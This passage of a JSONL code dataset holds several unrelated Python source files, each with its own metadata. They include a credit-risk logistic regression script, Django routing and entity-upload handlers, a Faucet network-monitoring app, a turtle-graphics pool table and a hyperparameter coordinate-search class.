include the SK_ID_CURR\r\nbureau_by_loan = bureau[['SK_ID_BUREAU', 'SK_ID_CURR']].merge(bureau_by_loan, on = 'SK_ID_BUREAU', how = 'left')\r\n\r\n# Aggregate the stats for each client\r\nbureau_balance_by_client = agg_numeric(bureau_by_loan.drop('SK_ID_BUREAU', axis=1), group_var = 'SK_ID_CURR', df_name = 'client')\r\n\r\n\r\napplication_train = application_train.merge(bureau_balance_by_client, on = 'SK_ID_CURR', how = 'left')\r\n\r\napplication_test = application_test.merge(bureau_balance_by_client, on = 'SK_ID_CURR', how = 'left')\r\n\r\n\r\nmissing_train = missing_values_table(application_train)\r\nmissing_train.head(20)\r\n\r\n\r\n\r\nmissing_train_vars = list(missing_train.index[missing_train['% of Total Values'] > 90])\r\nlen(missing_train_vars)\r\n\r\n#Aligning test and train data\r\n\r\ntrain_labels = application_train['TARGET']\r\n\r\n# Align the dataframes, this will remove the 'TARGET' column\r\napplication_train, application_test = application_train.align(application_test, join = 'inner', axis = 1)\r\n\r\napplication_train['TARGET'] = train_labels\r\n\r\n\r\n\r\nmissing_test = missing_values_table(application_test)\r\nmissing_test.head(20)\r\n\r\nmissing_test_vars = list(missing_test.index[missing_test['% of Total Values'] > 90])\r\nlen(missing_test_vars)\r\n\r\n\r\napplication_train.to_csv('train_bureau_raw.csv', index = False)\r\napplication_test.to_csv('test_bureau_raw.csv', index = False)\r\n\r\n\r\n#Missing value treatment\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler, Imputer\r\n\r\n# Drop the target from the training data\r\nif 'TARGET' in application_train:\r\n train = application_train.drop('TARGET',axis=1)\r\nelse:\r\n train = application_train.copy()\r\n \r\n# Feature names\r\nfeatures = list(train.columns)\r\n\r\n# Copy of the testing data\r\ntest = application_test.copy()\r\n\r\n# Median imputation of missing values\r\nimputer = Imputer(strategy = 'median')\r\n\r\n# Scale each feature to 0-1\r\nscaler = MinMaxScaler(feature_range = (0, 1))\r\n\r\n# Fit on the training data\r\nimputer.fit(train)\r\n\r\n# Transform both training and testing data\r\ntrain = imputer.transform(train)\r\ntest = imputer.transform(application_test)\r\n\r\n# Repeat with the scaler\r\nscaler.fit(train)\r\ntrain = scaler.transform(train)\r\ntest = scaler.transform(test)\r\n\r\nprint('Training data shape: ', train.shape)\r\nprint('Testing data shape: ', test.shape)\r\n\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n# Make the model with the specified regularization parameter\r\nlog_reg = LogisticRegression(C = 0.0001)\r\n\r\n# Train on the training data\r\nlog_reg.fit(train, train_labels)\r\n\r\n\r\n# Make predictions\r\nlog_reg_pred = log_reg.predict_proba(test)[:, 1]\r\n\r\n\r\n\r\n# Submission dataframe\r\nsubmit = application_test[['SK_ID_CURR']]\r\nsubmit['TARGET'] = log_reg_pred\r\n\r\nsubmit.head()","sub_path":"logistic regression model.py","file_name":"logistic regression model.py","file_ext":"py","file_size_in_byte":18305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"206135626","text":"from django.conf.urls import url, include\nfrom django.views import generic\nfrom django.urls import path\n\nurlpatterns = [\n\n url(r'^$', generic.RedirectView.as_view(\n url='/api/', permanent=False)),\n\n path(r'api/documents/', include('lmsinno.documents.documents_urls')),\n\n path(r'api/copies/', include('lmsinno.copies.copies_urls')),\n\n path(r'api/tags/', include('lmsinno.tags.tags_urls')),\n\n path(r'api/users/', include('lmsinno.users.users_urls')),\n\n path(r'api/', include('lmsinno.orders.orders_urls')),\n\n path(r'api/', include('lmsinno.api_documentation.api_documentation_urls'))\n]\n","sub_path":"server/lmsinno/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"47582380","text":"#!/usr/bin/python\n\"\"\"\n(C) Copyright - 2016 by Tiamo Laitakari\nTiamo.Laitakari@helsinki.fi\n\nAll rights reserved.\n\n\nRuns Hawkeye and works as an API bridge for JAVA.\n\"\"\"\n\nimport hawkeye.hawkconfig\nfrom hawkeye.lib import lsof\nfrom hawkeye.lib import ps\n\n\ndef __main__():\n lsof_rc = lsof.lsof().run_lsof()\n ps_rc = ps.ps().run_ps()\n\n if lsof_rc is not 0 or ps_rc is not 0:\n raise AttributeError(\"This is really bad!\")\n\nif __name__ == \"__main__\":\n __main__()\n","sub_path":"hawkeye/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"231701815","text":"import random\r\nimport pylab\r\nimport scipy.integrate\r\n\r\n\r\ndef gaussian(x, mu, sigma):\r\n factor1 = 1/(sigma*((2*pylab.pi)**0.5))\r\n factor2 = pylab.e**-(((x-mu)**2)/(2*sigma**2))\r\n return factor1 * factor2\r\n\r\nx_vals = []\r\ny_vals = []\r\nsigma = 1\r\nmu = 0\r\nx = -4\r\nwhile x <= 4:\r\n x_vals.append(x)\r\n y_vals.append(gaussian(x, mu, sigma))\r\n x += 0.05\r\npylab.plot(x_vals, y_vals)\r\npylab.title('Normal distribution. Sigma = ' + str(sigma) + ', mu = ' + str(mu))\r\npylab.show()\r\n\r\n\r\ndef check_empirical(num_trials):\r\n for n in range(num_trials):\r\n mu = random.randint(-10, 10)\r\n sigma = random.randint(1, 10)\r\n print('For mu =', mu, 'sigma =', sigma)\r\n for num_std in (1, 1.96, 3):\r\n area = scipy.integrate.quad(gaussian, mu - num_std * sigma, mu + num_std * sigma, (mu, sigma))[0]\r\n print(' Fraction within', num_std, 'std =', area)\r\n\r\n\r\ncheck_empirical(3)","sub_path":"MIT 6.0002/Confidence Intervals/Gauss.py","file_name":"Gauss.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445027839","text":"import os.path\nimport uuid\nfrom eledata import util\nfrom eledata.serializers.entity import EntityDetailedSerializer\nfrom eledata.models.entity import Entity\nfrom eledata.util import string_caster, HandlerError\nfrom eledata.core_engine.provider import EngineProvider\nfrom project.settings import CONSTANTS\n\n\nclass EntityViewSetHandler(object):\n def __init__(self):\n pass\n\n @staticmethod\n def select_entity(entity):\n if entity is None:\n return None\n\n serializer = EntityDetailedSerializer(entity)\n return serializer.data\n\n @staticmethod\n def get_entity_list(processing_list, completed_list):\n # retrieving list of constant entity\n # TODO: move status to constant/ utils, add the intermediate status\n constant_list = list(CONSTANTS.ENTITY.ENTITY_TYPE)\n for x in constant_list:\n if x['value'] in [y.type for y in completed_list]:\n x['status'] = 'ready'\n elif x['value'] in [y.type for y in processing_list]:\n x['status'] = 'processing'\n else:\n x['status'] = 'pending'\n return constant_list\n\n @staticmethod\n def create_entity(request_data, request_file, group, verifier):\n verifier.verify(1, request_data)\n # The dir that the uploaded data file will be saved to.\n # Appending the original filename to the end so that the new\n # filename has the same extension, while also making the filename\n # more recognizable.\n filename = \"temp/\" + str(uuid.uuid4()) + \".\" + str(request_file)\n\n with open(filename, \"w\") as fi:\n fi.write(request_file.read())\n # Parsing the entity JSON passed in into a dictionary\n entity_dict = util.from_json(request_data[\"entity\"])\n # del entity_dict['update_mechanism']\n\n entity_dict[\"source\"] = {\n \"file\": {\"filename\": filename,\n \"is_header_included\": request_data[\"isHeaderIncluded\"]}}\n\n entity_dict['state'] = 1\n verifier.verify(2, entity_dict)\n\n # TODO: calculate draft of data summary here?\n entity_data = util.file_to_list_of_dictionaries(\n open(entity_dict[\"source\"][\"file\"][\"filename\"]),\n numLines=100,\n is_header_included=util.string_caster[\"bool\"](\n entity_dict[\"source\"][\"file\"][\"is_header_included\"]))\n\n entity_dict['temp_data'] = entity_data\n entity_dict['temp_header'] = CONSTANTS.ENTITY.HEADER_OPTION.get(entity_dict[\"type\"].upper())\n serializer = EntityDetailedSerializer(data=entity_dict)\n verifier.verify(3, serializer)\n\n entity = serializer.create(serializer.validated_data)\n entity.group = group\n entity.save()\n\n response_data = {\n 'entity_id': str(entity.id),\n 'data': entity_data,\n 'header_option': CONSTANTS.ENTITY.HEADER_OPTION.get(entity_dict[\"type\"].upper())\n }\n # Saving the serializer while also adding its id to the response\n # Loading the first 100 lines of data from the request file\n # Passing header option from constants file\n\n return response_data\n\n @staticmethod\n def create_entity_mapped(request_data, verifier, pk, group):\n entity = Entity.objects.get(pk=pk)\n verifier.verify(0, request_data, entity, pk)\n verifier.verify(1, entity, group)\n verifier.verify(2, request_data['data_header'], entity.source.file.filename)\n\n # We will create a dummy entity whose only purpose is to serialize the\n # two fields we give it, so we can add them to the actual entity. The\n # dummy starts as a dictionary and then becomes an Entity.\n raw_dummy = {'data_header': request_data['data_header']}\n\n assert os.path.isfile(entity.source.file.filename)\n data = util.file_to_list_of_dictionaries(\n open(entity.source.file.filename, 'r'),\n is_header_included=entity.source.file.is_header_included)\n\n # Changing the user created field names in data to the new mapped names\n try:\n for item in data:\n for mapping in raw_dummy['data_header']:\n item[mapping[\"mapped\"]] = item[mapping[\"source\"]]\n # Avoid deleting data when mapped is source\n if mapping[\"mapped\"] != mapping[\"source\"]:\n del item[mapping[\"source\"]]\n\n # Casting everything in data from strings to their proper data type\n # according to request.data['data_header']\n for item in data:\n for mapping in raw_dummy['data_header']:\n item[mapping[\"mapped\"]] = \\\n string_caster[mapping[\"data_type\"]](item[mapping[\"mapped\"]])\n\n except KeyError as e:\n # TODO: do logging against e\n raise HandlerError('mappingError')\n except ValueError as e:\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n # Generating Entity Summary and Chart Summary after mapping is confirmed.\n summary_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Summary\",\n group=group,\n params=None,\n entity_data=data,\n entity_type=entity.type)\n chart_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Chart\",\n group=group,\n params=None,\n entity_data=data,\n entity_type=entity.type)\n performance_chart_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.PerformanceChart\",\n group=group,\n params=None,\n entity_data=data,\n entity_type=entity.type)\n try:\n summary_entity_stats_engine.execute()\n chart_entity_stats_engine.execute()\n performance_chart_entity_stats_engine.execute()\n except ValueError as e:\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n # TODO: generate create entity audit\n # TODO: use mongoengine aggregate to do data_summary\n\n raw_dummy['data_summary'] = summary_entity_stats_engine.get_processed()\n raw_dummy['data_summary_chart'] = chart_entity_stats_engine.get_processed()\n raw_dummy['data_performance_chart'] = performance_chart_entity_stats_engine.get_processed()\n\n dummy_serializer = EntityDetailedSerializer(data=raw_dummy)\n verifier.verify(3, dummy_serializer)\n dummy = Entity(**dummy_serializer.validated_data)\n\n # Adding the dummy's fields to the actual entity\n entity.add_change(data)\n entity.data_header = dummy.data_header\n entity.data_summary = dummy.data_summary\n entity.data_summary_chart = dummy.data_summary_chart\n entity.data_performance_chart = dummy.data_performance_chart\n\n os.remove(entity.source.file.filename)\n entity.source.file = None\n entity.state = 2\n entity.save()\n\n # TODO: this is the pain point for h2o testing to be extremely slow\n entity.save_data_changes()\n group.update_analysis_question_enable()\n\n response_data = {\n 'entity_summary': raw_dummy['data_summary'],\n 'data': data[:100],\n 'header_option': CONSTANTS.ENTITY.HEADER_OPTION.get(entity.type.upper())\n }\n return response_data\n\n @staticmethod\n def entity_data_update(request_data, request_file, pk, group):\n entity = Entity.objects(pk=pk, group=group)\n\n filename = \"temp/\" + str(uuid.uuid4()) + \".\" + str(request_file)\n with open(filename, \"w\") as fi:\n fi.write(request_file.read())\n\n # Parsing the entity JSON passed in into a dictionary\n entity_dict = util.from_json(request_data[\"entity\"])\n\n entity_data = util.file_to_list_of_dictionaries(\n open(filename),\n numLines=100,\n is_header_included=request_data[\"isHeaderIncluded\"])\n\n # Parsing the entity JSON passed in into a dictionary\n entity.update_one(set__source__file__filename=filename,\n set__source__file__is_header_included=request_data[\"isHeaderIncluded\"],\n set__source__update_mechanism=entity_dict['update_mechanism'],\n set__state=3,\n set__temp_data=entity_data\n )\n\n # Reload changed entity\n updated_entity = Entity.objects(pk=pk, group=group).first()\n updated_entity.reload()\n\n response_data = {\n 'entity_id': str(updated_entity.id),\n 'data': entity_data,\n 'header_option': CONSTANTS.ENTITY.HEADER_OPTION.get(updated_entity.type.upper())\n }\n # Loading the first 100 lines of data from the request file\n # Passing header option from constants file\n\n return response_data\n\n @staticmethod\n def entity_date_update_stage2(verifier, pk, group):\n entity = Entity.objects(pk=pk).first()\n\n # We will create a dummy entity whose only purpose is to serialize the\n # two fields we give it, so we can add them to the actual entity. The\n # dummy starts as a dictionary and then becomes an Entity.\n data_header = entity.data_header\n\n assert os.path.isfile(entity.source.file.filename)\n data = util.file_to_list_of_dictionaries(\n open(entity.source.file.filename, 'r'),\n is_header_included=entity.source.file.is_header_included)\n\n # Changing the user created field names in data to the new mapped names\n try:\n for item in data:\n for mapping in data_header:\n item[mapping[\"mapped\"]] = item[mapping[\"source\"]]\n # Avoid deleting data when mapped is source\n if mapping[\"mapped\"] != mapping[\"source\"]:\n del item[mapping[\"source\"]]\n\n # Casting everything in data from strings to their proper data type\n # according to request.data['data_header']\n for item in data:\n for mapping in data_header:\n item[mapping[\"mapped\"]] = \\\n string_caster[mapping[\"data_type\"]](item[mapping[\"mapped\"]])\n except KeyError as e:\n print(e.message)\n # TODO: do logging against e\n raise HandlerError('mappingError')\n except ValueError as e:\n print(e.message)\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n is_replace = False if entity.source.update_mechanism == 'incremental' else True\n entity.add_change(data, replace=is_replace)\n entity.save_data_changes()\n\n # Generating Entity Summary and Chart Summary after mapping is confirmed.\n summary_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Summary\",\n group=group,\n params=None,\n entity_data=entity.data,\n entity_type=entity.type)\n chart_entity_stats_engine = EngineProvider \\\n .provide(\"EntityStats.Chart\",\n group=group,\n params=None,\n entity_data=entity.data,\n entity_type=entity.type)\n try:\n summary_entity_stats_engine.execute()\n chart_entity_stats_engine.execute()\n except ValueError as e:\n # TODO: do logging against e\n raise HandlerError('mappingTypeError')\n\n os.remove(entity.source.file.filename)\n\n Entity.objects(pk=pk).update_one(\n set__data_summary=summary_entity_stats_engine.get_processed(),\n set__data_summary_chart=chart_entity_stats_engine.get_processed(),\n set__source__file=None,\n set__state=2\n )\n entity.reload()\n\n return {\"msg\": \"Updated successful\"}\n\n @staticmethod\n def remove_stage1_entity(request_data, verifier, group):\n\n verifier.verify(0, request_data)\n verifier.verify(1, request_data)\n\n entity = Entity.objects.get(group=group, type=request_data['entity_type'])\n\n verifier.verify(2, entity)\n\n entity.delete()\n\n return {\"msg\": \"Remove successful\"}\n\n @staticmethod\n def rollback_stage3_entity(pk, verifier, group):\n\n entity = Entity.objects(pk=pk, group=group)\n\n entity.update_one(set__state=2)\n\n # Reload changed entity\n Entity.objects(pk=pk, group=group).first().reload()\n\n return {\"msg\": \"Rollback successful\"}\n","sub_path":"eledata/handlers/create_entity.py","file_name":"create_entity.py","file_ext":"py","file_size_in_byte":12847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501793413","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('buscador', '0014_auto_20150901_1619'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bodegas',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('nombre', models.CharField(max_length=30)),\n ('direccion', models.CharField(max_length=200)),\n ('coorx', models.FloatField(default=0)),\n ('coory', models.FloatField(default=0)),\n ('telefono', models.IntegerField(default=0)),\n ('ciudad', models.ForeignKey(to='buscador.Ciudad')),\n ('departamento', models.ForeignKey(to='buscador.Departamento')),\n ],\n options={\n 'ordering': ['nombre'],\n },\n ),\n ]\n","sub_path":"buscador/migrations/0015_bodegas.py","file_name":"0015_bodegas.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"353182420","text":"# James Cooper, 15 November 2018, Pool Table Turtle Lab\r\n\r\nfrom turtle import *\r\n\r\ns = Turtle() # \r\nt = Turtle() # global turtle variables\r\nf = Turtle() #\r\ntex = Turtle()#\r\n\r\ntitle(\"Pool Table\") # Title of program in top bar \r\nbgcolor(\"black\") # Set background color to black\r\n\r\nspeed(0) # Set turtle speed to maximum speed\r\n\r\nt.ht() # \r\nf.ht() # \r\ntex.ht() # global hiding of turtles in the wild, the predators have come out\r\ns.ht() # \r\n\r\ndef bounce_horizontal(): # Defining fucntion that sets the ball parameters and sends it horizontally\r\n \r\n t.color(\"white\") #section to draw ball\r\n t.pu() # Pen up for turtle so a line is not drawn\r\n t.shape(\"circle\") # Draws a circle\r\n t.shapesize(2,2) # Set shape parameters\r\n t.setpos(0,0) # Sets position\r\n t.st() # Shows the turtle\r\n delay(25) # Delay of movement when working with whole program\r\n t.goto(282,0) # Moves ball from start position to new position - causes movement\r\n\r\ndef tableout(): # Defining a function that will draw the table and my name\r\n\r\n f.color(\"#84391b\") # Set color of shape to brown\r\n f.pu() # Pen up for turtle so a line is not drawn\r\n f.shape(\"square\") # Draws a square\r\n f.fillcolor(\"#84391b\") # Set color of shape filling to brown\r\n f.shapesize(20,32,25) # Set shape parameters\r\n f.setpos(0,0) # Set turtle position to the origin\r\n f.st() # Shows the turtle\r\n \r\n s.color(\"green\") # Set color of shape to green\r\n s.pu() # Pen up for turtle so a line is not drawn\r\n s.shape(\"square\") # Draws a square\r\n s.fillcolor(\"green\") # Set color of shape filling to green\r\n s.shapesize(17,29,25) # Set shape parameters\r\n s.setpos(0,0) # Set turtle positoin to the origin\r\n s.st() # Shows the turtle\r\n\r\n tex.color(\"white\") # Setting turtle color to white\r\n tex.pu() # Pen up for turtle so a line is not drawn\r\n tex.setpos(590,-400) # Setting turtle coordinates\r\n tex.write(\"- James Cooper\",align = \"left\",font = (\"Ariel\",20,\"normal\")) # Writing my name\r\n \r\ndef bounce_diag(): # Defining a function that will \r\n \r\n t.st() # Shows the turtle\r\n delay(30) # Sets delay of movement\r\n t.goto(0,162) # Tells turtle to move to a point\r\n \r\ndef bounce_vert(): # Defining a function that will move the ball vertically to a point\r\n\r\n t.st # Shows the turtle\r\n delay(35) # Sets delay of movement\r\n t.goto(0,-72) # Tells turtle to move to a point\r\n \r\ndef main(): # Defing variable for a single calling function\r\n tableout() # \r\n bounce_horizontal()# Calling of fucntions in order of movement and purpose\r\n bounce_diag() # \r\n bounce_vert() # \r\n \r\nmain() # Calling the main function\r\n","sub_path":"pooltableturtle_Cooper_James.py","file_name":"pooltableturtle_Cooper_James.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"345228202","text":"# Copyright (C) 2015 Research and Education Advanced Network New Zealand Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport time\nimport os\nimport signal\n\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller import dpset\nfrom ryu.controller import event\nfrom ryu.controller.handler import MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\n\nfrom config_parser import watcher_parser\nfrom util import kill_on_exception, get_sys_prefix, get_logger, dpid_log\nfrom watcher import watcher_factory\n\n\nclass EventGaugeReconfigure(event.EventBase):\n pass\n\nclass Gauge(app_manager.RyuApp):\n \"\"\"Ryu app for polling Faucet controlled datapaths for stats/state.\n\n It can poll multiple datapaths. The configuration files for each datapath\n should be listed, one per line, in the file set as the environment variable\n GAUGE_CONFIG. It logs to the file set as the environment variable\n GAUGE_LOG,\n \"\"\"\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n _CONTEXTS = {'dpset': dpset.DPSet}\n\n logname = 'gauge'\n exc_logname = logname + '.exception'\n\n def __init__(self, *args, **kwargs):\n super(Gauge, self).__init__(*args, **kwargs)\n sysprefix = get_sys_prefix()\n self.config_file = os.getenv(\n 'GAUGE_CONFIG', sysprefix + '/etc/ryu/faucet/gauge.yaml')\n self.exc_logfile = os.getenv(\n 'GAUGE_EXCEPTION_LOG',\n sysprefix + '/var/log/ryu/faucet/gauge_exception.log')\n self.logfile = os.getenv(\n 'GAUGE_LOG', sysprefix + '/var/log/ryu/faucet/gauge.log')\n\n # Setup logging\n self.logger = get_logger(\n self.logname, self.logfile, logging.DEBUG, 0)\n # Set up separate logging for exceptions\n self.exc_logger = get_logger(\n self.exc_logname, self.exc_logfile, logging.CRITICAL, 1)\n\n # Set the signal handler for reloading config file\n signal.signal(signal.SIGHUP, self.signal_handler)\n\n # dict of watchers/handlers:\n # indexed by dp_id and then by name\n self.watchers = {}\n confs = watcher_parser(self.config_file, self.logname)\n for conf in confs:\n watcher = watcher_factory(conf)(conf, self.logname)\n self.watchers.setdefault(watcher.dp.dp_id, {})\n self.watchers[watcher.dp.dp_id][watcher.conf.type] = watcher\n # Create dpset object for querying Ryu's DPSet application\n self.dpset = kwargs['dpset']\n\n @set_ev_cls(dpset.EventDP, dpset.DPSET_EV_DISPATCHER)\n @kill_on_exception(exc_logname)\n def handler_connect_or_disconnect(self, ryu_event):\n ryu_dp = ryu_event.dp\n dp_id = ryu_dp.id\n if dp_id not in self.watchers:\n self.logger.info('no watcher configured for %s', dpid_log(dp_id))\n return\n\n if ryu_event.enter: # DP is connecting\n self.logger.info('%s up', dpid_log(dp_id))\n for watcher in self.watchers[dp_id].values():\n watcher.start(ryu_dp)\n else: # DP is disconnecting\n if ryu_dp.id in self.watchers:\n for watcher in self.watchers[dp_id].values():\n watcher.stop()\n del self.watchers[dp_id]\n self.logger.info('%s down', dpid_log(dp_id))\n\n def signal_handler(self, sigid, frame):\n if sigid == signal.SIGHUP:\n self.send_event('Gauge', EventGaugeReconfigure())\n\n @set_ev_cls(EventGaugeReconfigure, MAIN_DISPATCHER)\n def reload_config(self, ryu_event):\n self.config_file = os.getenv('GAUGE_CONFIG', self.config_file)\n\n new_confs = watcher_parser(self.config_file, self.logname)\n new_watchers = {}\n for conf in new_confs:\n watcher = watcher_factory(conf)(conf, self.logname)\n new_watchers.setdefault(watcher.dp.dp_id, {})\n new_watchers[watcher.dp.dp_id][watcher.conf.type] = watcher\n\n for dp_id, watchers in self.watchers:\n for watcher_type, watcher in watchers:\n try:\n new_watcher = new_watchers[dp_id][watcher_type]\n self.watchers[dp_id][watcher_type] = new_watcher\n except KeyError:\n del self.watchers[dp_id][watcher_type]\n if watcher.running():\n watcher.stop()\n new_watcher.start(self.dpset.get(dp_id))\n\n @set_ev_cls(dpset.EventDPReconnected, dpset.DPSET_EV_DISPATCHER)\n @kill_on_exception(exc_logname)\n def handler_reconnect(self, ryu_event):\n ryu_dp = ryu_event.dp\n self.logger.info('%s reconnected', dpid_log(ryu_dp.id))\n for watcher in self.watchers[ryu_dp.id].values():\n watcher.start(ryu_dp)\n\n def update_watcher(self, dp_id, name, msg):\n rcv_time = time.time()\n if dp_id in self.watchers and name in self.watchers[dp_id]:\n self.watchers[dp_id][name].update(rcv_time, msg)\n\n @set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER) # pylint: disable=no-member\n @kill_on_exception(exc_logname)\n def port_status_handler(self, ryu_event):\n self.update_watcher(ryu_event.msg.datapath.id, 'port_state', ryu_event.msg)\n\n @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER) # pylint: disable=no-member\n @kill_on_exception(exc_logname)\n def port_stats_reply_handler(self, ryu_event):\n self.update_watcher(ryu_event.msg.datapath.id, 'port_stats', ryu_event.msg)\n\n @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER) # pylint: disable=no-member\n @kill_on_exception(exc_logname)\n def flow_stats_reply_handler(self, ryu_event):\n self.update_watcher(ryu_event.msg.datapath.id, 'flow_table', ryu_event.msg)\n","sub_path":"src/ryu_faucet/org/onfsdn/faucet/gauge.py","file_name":"gauge.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"81549650","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/quickwiki/tests/functional/test_pages.py\n# Compiled at: 2009-02-23 12:50:50\nfrom quickwiki.tests import *\n\nclass TestPagesController(TestController):\n\n def test_index(self):\n response = self.app.get(url(controller='pages', action='index'))\n self.assert_('Title List' in response)\n self.assert_('FrontPage' in response)","sub_path":"pycfiles/QuickWiki-0.1.6-py2.5/test_pages.py","file_name":"test_pages.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"448928603","text":"from typing import Union\nfrom ..search import HyperOpt\nfrom ..spaces import GridSpace\nimport numpy as np\nfrom rich.console import Console\n\n\nclass CoordinateSearch(HyperOpt):\n def __init__(\n self,\n real: Union[dict, None] = None,\n integer: Union[dict, None] = None,\n categorical: Union[dict, None] = None,\n search_config: dict = {},\n maximize_objective: bool = False,\n fixed_params: Union[dict, None] = None,\n reload_path: Union[str, None] = None,\n reload_list: Union[list, None] = None,\n seed_id: int = 42,\n verbose: bool = False,\n ):\n HyperOpt.__init__(\n self,\n real,\n integer,\n categorical,\n search_config,\n maximize_objective,\n fixed_params,\n reload_path,\n reload_list,\n seed_id,\n verbose,\n )\n self.evals_per_coord = [0]\n var_counter = 0\n for k in self.search_config[\"order\"]:\n if self.real is not None:\n if k in self.real.keys():\n self.evals_per_coord.append(self.real[k][\"bins\"] + var_counter)\n var_counter += 1\n\n if self.integer is not None:\n if k in self.integer.keys():\n self.evals_per_coord.append(self.integer[k][\"bins\"] + var_counter)\n var_counter += 1\n\n if self.categorical is not None:\n for k in self.categorical.keys():\n self.evals_per_coord.append(len(self.categorical[k]) + var_counter)\n var_counter += 1\n self.range_per_coord = np.cumsum(self.evals_per_coord)\n\n # Sequentially set-up different grid spaces - initialize 1st one\n self.grid_var_counter = 0\n self.var_counter = 0\n self.construct_active_space()\n self.search_name = \"Coordinate-Wise Search\"\n\n # Add start-up message printing the search space\n if self.verbose:\n self.print_hello()\n\n def ask_search(self, batch_size: int):\n \"\"\"Get proposals to eval next (in batches) - Coordinate Search\"\"\"\n # Set grid counter to eval_counter in order ensure while\n # That results for grid configuration are collected before continuation\n self.grid_var_counter = (\n self.eval_counter - self.range_per_coord[self.var_counter]\n )\n\n param_batch = []\n # Sample a new configuration for each eval in the batch\n while len(param_batch) < batch_size and self.grid_var_counter < len(self.space):\n # Get parameter batch from the grid\n proposal_params = self.space.param_grid[self.grid_var_counter]\n if proposal_params not in (self.all_evaluated_params + param_batch):\n # Add parameter proposal to the batch list\n param_batch.append(proposal_params)\n self.grid_var_counter += 1\n else:\n # Otherwise continue sampling proposals\n self.grid_var_counter += 1\n continue\n return param_batch\n\n def tell_search(self, batch_proposals: list, perf_measures: list):\n \"\"\"Update search log data - Coordinate Search\"\"\"\n # Update/reset variable and grid counter based on eval_counter\n # And evals per search space (makes it easier to reload)\n self.grid_var_counter = (\n self.eval_counter - self.range_per_coord[self.var_counter]\n )\n if self.grid_var_counter >= len(self.space) - self.var_counter:\n self.var_counter += 1\n if self.var_counter < len(self.search_config[\"order\"]):\n self.construct_active_space()\n self.grid_var_counter = 0\n\n def construct_active_space(self):\n \"\"\"Construct the active search space.\"\"\"\n # Update the parameter defaults with the best performers\n if self.eval_counter > 0:\n idx, config, eval = self.get_best()\n for k, v in config.items():\n if k == self.search_config[\"order\"][self.var_counter - 1]:\n self.search_config[\"defaults\"][k] = v\n if self.verbose:\n Console().log(f\"Fixed `{k}` hyperparameter to {v}.\")\n\n # Increase active variable counter and reset grid counter\n self.active_var = self.search_config[\"order\"][self.var_counter]\n if self.verbose:\n Console().log(f\"New active variable `{self.active_var}`.\")\n\n # Create new grid search space - if fixed: Create categorical\n # Note: Only one variable is 'active' at every time\n real_sub, integer_sub, categorical_sub = {}, {}, {}\n if self.real is not None:\n for k in self.real.keys():\n if k == self.active_var:\n real_sub[k] = self.real[k]\n else:\n categorical_sub[k] = [self.search_config[\"defaults\"][k]]\n\n if self.integer is not None:\n for k in self.integer.keys():\n if k == self.active_var:\n integer_sub[k] = self.integer[k]\n else:\n categorical_sub[k] = [self.search_config[\"defaults\"][k]]\n\n if self.categorical is not None:\n for k in self.categorical.keys():\n if k == self.active_var:\n categorical_sub[k] = self.categorical[k]\n else:\n categorical_sub[k] = [self.search_config[\"defaults\"][k]]\n\n # Construct new grid space with fixed coordinates!\n self.space = GridSpace(real_sub, integer_sub, categorical_sub)\n","sub_path":"mle_hyperopt/strategies/coordinate.py","file_name":"coordinate.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"455938897","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom urllib import request\nimport urllib\n\nfrom collections import 